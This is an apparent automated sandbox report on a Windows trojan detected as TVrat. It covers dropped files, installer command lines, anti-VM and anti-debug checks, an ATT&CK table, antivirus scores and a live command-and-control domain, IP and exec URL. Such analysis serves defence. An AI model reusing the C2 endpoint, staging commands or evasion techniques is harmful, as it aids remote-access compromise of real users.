                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-60GLH.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-MU1HO.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\template\msvcr120.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\template\libjpeg-turbo-win.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\libcryptoMD.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\template\aw_sas32.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-VO31B.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\template\libcurl.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-AAPRN.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\aw_sas32.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KMJLJ.tmp\_isetup\_iscrypt.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KMJLJ.tmp\_isetup\_shfoldr.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\template\hatls.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\libjpeg-turbo-win.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-0HK0N.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\template\libeay32.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\is-E6DJ2.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u7i3kw\astrct.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeAPI coverage: 2.8 %
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeFile opened: PhysicalDrive0Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_3_070025DB FindFirstFileA,FindNextFileA,FindClose,11_3_070025DB
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_070025DB lstrcat,FindFirstFileA,lstrcat,FindNextFileA,FindClose,11_2_070025DB
                          Source: is-TBGHD.tmp.4.drBinary or memory string: VMware
                          Source: is-TBGHD.tmp.4.drBinary or memory string: VBoxService.exe
                          Source: aeyh21MAtA.tmp, 00000001.00000002.2083863637.000000000063C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: aeyh21MAtA.tmp, 00000001.00000002.2083863637.000000000063C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\%
                          Source: is-TBGHD.tmp.4.drBinary or memory string: VMWare
                          Source: ast.exe, 0000000B.00000002.2862003498.0000000000E0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
                          Source: ast.exe, 0000000A.00000002.3342382296.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000C.00000002.2941388188.0000000000D8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: is-TBGHD.tmp.4.drBinary or memory string: VBoxService.exeU
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B7CEFE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6B7CEFE1
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B7AAE50 WSAStartup,WSACleanup,GetModuleHandleA,GetProcAddress,_strpbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,if_nametoindex,QueryPerformanceFrequency,10_2_6B7AAE50
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B7CC43E mov eax, dword ptr fs:[00000030h]10_2_6B7CC43E
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B7D1C01 mov eax, dword ptr fs:[00000030h]10_2_6B7D1C01
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_3_07001E1D mov edi, dword ptr fs:[00000030h]11_3_07001E1D
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B7CEFE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6B7CEFE1
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B7BDC3A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_6B7BDC3A
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpProcess created: C:\Users\user\Desktop\aeyh21MAtA.exe "C:\Users\user\Desktop\aeyh21MAtA.exe" /verysilent /password=lzueuxcJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\u7i3kw\*" "C:\Users\user\AppData\Roaming\template\"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\template\ast.exe "C:\Users\user\AppData\Roaming\template\ast.exe" Jump to behavior
                          Source: ast.exe, 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, is-TBGHD.tmp.4.drBinary or memory string: Shell_TrayWndSVW
                          Source: ast.exe, 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, is-TBGHD.tmp.4.drBinary or memory string: Shell_TrayWnd
                          Source: ast.exe, 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, is-TBGHD.tmp.4.drBinary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32SVW
                          Source: ast.exe, 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, is-TBGHD.tmp.4.drBinary or memory string: Shell_TrayWndTrayNotifyWndSV
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B7CFBD1 GetSystemTimeAsFileTime,10_2_6B7CFBD1
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_3_070021FF GetUserNameA,11_3_070021FF
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: ast.exe, ast.exe, 0000000B.00000003.2846242603.0000000007001000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: PROCEXP.EXE

                          Stealing of Sensitive Information

                          barindex
                          Yara detected TVrat
                          Source: Yara matchFile source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ast.exe PID: 3380, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\template\ast.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\u7i3kw\is-TBGHD.tmp, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Yara detected TVrat
                          Source: Yara matchFile source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ast.exe PID: 3380, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\template\ast.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\u7i3kw\is-TBGHD.tmp, type: DROPPED
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B7A6D50 socket,socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,curl_msnprintf,send,recv,closesocket,closesocket,closesocket,closesocket,closesocket,10_2_6B7A6D50
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B7739A0 curl_pushheader_bynum,inet_pton,htons,inet_pton,htons,htons,htons,bind,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,10_2_6B7739A0
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 10_2_6B77EEA0 ___from_strstr_to_strchr,_strncpy,___from_strstr_to_strchr,inet_pton,_strncpy,___from_strstr_to_strchr,___from_strstr_to_strchr,curl_pushheader_bynum,getsockname,WSAGetLastError,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,htons,curl_msnprintf,curl_easy_strerror,curl_easy_strerror,10_2_6B77EEA0
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E168FD sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings,11_2_61E168FD
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E283DC sqlite3_bind_blob64,11_2_61E283DC
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E283B5 sqlite3_mutex_leave,sqlite3_bind_blob,11_2_61E283B5
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E285E9 sqlite3_bind_zeroblob,sqlite3_mutex_leave,11_2_61E285E9
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E095A5 sqlite3_bind_parameter_index,11_2_61E095A5
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E285B8 sqlite3_bind_null,sqlite3_mutex_leave,11_2_61E285B8
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E03587 sqlite3_bind_parameter_name,11_2_61E03587
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E28592 sqlite3_bind_int,sqlite3_bind_int64,11_2_61E28592
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E03575 sqlite3_bind_parameter_count,11_2_61E03575
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E28543 sqlite3_bind_int64,sqlite3_mutex_leave,11_2_61E28543
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E284DE sqlite3_bind_double,sqlite3_mutex_leave,11_2_61E284DE
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E284B7 sqlite3_bind_text16,11_2_61E284B7
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E2844A sqlite3_bind_text64,11_2_61E2844A
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E28423 sqlite3_bind_text,11_2_61E28423
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E1672A sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,11_2_61E1672A
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E2873D sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave,11_2_61E2873D
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeCode function: 11_2_61E28656 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,11_2_61E28656

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information1
                          Scripting                          		Valid Accounts2
                          Windows Management Instrumentation                          		1
                          Scripting                          		1
                          DLL Side-Loading                          		1
                          Deobfuscate/Decode Files or Information                          		OS Credential Dumping1
                          System Time Discovery                          		Remote Services12
                          Archive Collected Data                          		1
                          Ingress Tool Transfer                          		Exfiltration Over Other Network Medium1
                          Data Encrypted for Impact
                          CredentialsDomainsDefault Accounts1
                          Native API                          		1
                          DLL Side-Loading                          		12
                          Process Injection                          		3
                          Obfuscated Files or Information                          		LSASS Memory1
                          Account Discovery                          		Remote Desktop ProtocolData from Removable Media21
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAt1
                          Registry Run Keys / Startup Folder                          		1
                          Registry Run Keys / Startup Folder                          		1
                          Software Packing                          		Security Account Manager3
                          File and Directory Discovery                          		SMB/Windows Admin SharesData from Network Shared Drive1
                          Non-Standard Port                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                          DLL Side-Loading                          		NTDS123
                          System Information Discovery                          		Distributed Component Object ModelInput Capture2
                          Non-Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          Masquerading                          		LSA Secrets331
                          Security Software Discovery                          		SSHKeylogging3
                          Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                          Virtualization/Sandbox Evasion                          		Cached Domain Credentials21
                          Virtualization/Sandbox Evasion                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                          Process Injection                          		DCSync3
                          Process Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                          Application Window Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow3
                          System Owner/User Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1558736 Sample: aeyh21MAtA.exe Startdate: 19/11/2024 Architecture: WINDOWS Score: 88 68 id.xn--80akicokc0aablc.xn--p1ai 2->68 78 Antivirus / Scanner detection for submitted sample 2->78 80 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->80 82 Multi AV Scanner detection for submitted file 2->82 84 Yara detected TVrat 2->84 11 aeyh21MAtA.exe 2 2->11         started        14 ast.exe 4 2->14         started        16 ast.exe 4 2->16         started        signatures3 process4 file5 54 C:\Users\user\AppData\...\aeyh21MAtA.tmp, PE32 11->54 dropped 18 aeyh21MAtA.tmp 3 6 11->18         started        process6 file7 38 C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32 18->38 dropped 40 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 18->40 dropped 42 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 18->42 dropped 21 aeyh21MAtA.exe 2 18->21         started        process8 file9 44 C:\Users\user\AppData\...\aeyh21MAtA.tmp, PE32 21->44 dropped 24 aeyh21MAtA.tmp 5 29 21->24         started        process10 file11 46 C:\Users\user\AppData\...\quartz.dll (copy), PE32 24->46 dropped 48 C:\Users\user\AppData\...\opus.dll (copy), PE32 24->48 dropped 50 C:\Users\user\...\libssl-1_1.dll (copy), PE32 24->50 dropped 52 30 other files (24 malicious) 24->52 dropped 27 cmd.exe 2 24->27         started        process12 process13 29 xcopy.exe 24 27->29         started        32 ast.exe 25 4 27->32         started        36 conhost.exe 27->36         started        dnsIp14 56 C:\Users\user\AppData\Roaming\...\quartz.dll, PE32 29->56 dropped 58 C:\Users\user\AppData\Roaming\...\opus.dll, PE32 29->58 dropped 60 C:\Users\user\AppData\...\libssl-1_1.dll, PE32 29->60 dropped 62 12 other files (11 malicious) 29->62 dropped 64 id.xn--80akicokc0aablc.xn--p1ai 212.193.169.65, 443, 44335, 49977 SAFIB-ASRU Russian Federation 32->64 66 127.0.0.1 unknown unknown 32->66 70 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 32->70 72 Tries to delay execution (extensive OutputDebugStringW loop) 32->72 74 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 32->74 76 Tries to detect virtualization through RDTSC time measurements 32->76 file15 signatures16

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          aeyh21MAtA.exe37%ReversingLabsWin32.Trojan.Generic
                          aeyh21MAtA.exe100%AviraTR/Spy.Agent.epnkj

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\is-3UH24.tmp\_isetup\_iscrypt.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-3UH24.tmp\_isetup\_setup64.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-3UH24.tmp\_isetup\_shfoldr.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-KMJLJ.tmp\_isetup\_iscrypt.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-KMJLJ.tmp\_isetup\_setup64.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-KMJLJ.tmp\_isetup\_shfoldr.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp2%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp2%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\AstCrp.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\ast.exe (copy)12%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\astclient.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\astrct.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\aw_sas32.dll (copy)4%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\hatls.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-0HK0N.tmp4%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-16KCC.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-5765H.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-5FFPK.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-60GLH.tmp4%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-AAPRN.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-BG0DN.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-E6DJ2.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-GPS00.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-MU1HO.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-S3CIC.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-SNDPS.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-TBGHD.tmp12%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\is-VO31B.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\libcrypto-1_1.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\libcryptoMD.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\libcurl.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\libeay32.dll (copy)4%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\libjpeg-turbo-win.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\libssl-1_1.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\msvcr120.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\u7i3kw\opus.dll (copy)0%ReversingLabs

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          https://id.xn--80akicokc0aablc.xn--p1ai:44335i:443y0%Avira URL Cloudsafe
                          http://www.borland.com/namespaces/Typesw_sas3Y0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443f0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443h0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443mUbx0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443k0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443g0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443i0%Avira URL Cloudsafe
                          http://www.borland.com/namespaces/Typesui0%Avira URL Cloudsafe
                          http://www.kngstr.com/?PreDefines.ishAbout0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:44335......0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:44335-0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aiCY0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443U0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443JV0%Avira URL Cloudsafe
                          http://www.borland.com/namespaces/Typeste0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443.0%Avira URL Cloudsafe
                          http://crl.globalsign.0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443CBOs0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai443...0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443rV0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aiv0%Avira URL Cloudsafe
                          https://id.xn--80ak0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443iVfy0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443ts0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443$0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443uV0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443l~0%Avira URL Cloudsafe
                          https://id.xn--80akico0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443uin0%Avira URL Cloudsafe
                          http://www.borland.com/namespaces/Typesw0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443:V0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aiIZ0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443...430%Avira URL Cloudsafe
                          https://id.xn--80akicokc0ar0%Avira URL Cloudsafe
                          http://ocsp2.globalsign.0%Avira URL Cloudsafe
                          http://www.kngstr.com/?PreDefines.ish0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aid0030%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aij0%Avira URL Cloudsafe
                          http://crypto-st.art/update.php0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443VV0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aii0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aa0%Avira URL Cloudsafe
                          http://www.borland.com/namespaces/Typesnu0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443-00%Avira URL Cloudsafe
                          http://www.borland.com/namespaces/Typesh0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443vU0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aihY0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443AUB0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443...0%Avira URL Cloudsafe
                          http://www.borland.com/namespaces/Typese0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai10%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai000%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443NUGx0%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          id.xn--80akicokc0aablc.xn--p1ai
                          		212.193.169.65
                          		truefalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://id.xn--80akicokc0aablc.xn--p1ai:443/api/execfalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://id.xn--80akicokc0aablc.xn--p1ai:443/ING=Defauiast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Typesast.exe, 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, is-TBGHD.tmp.4.drfalse
                                  		high
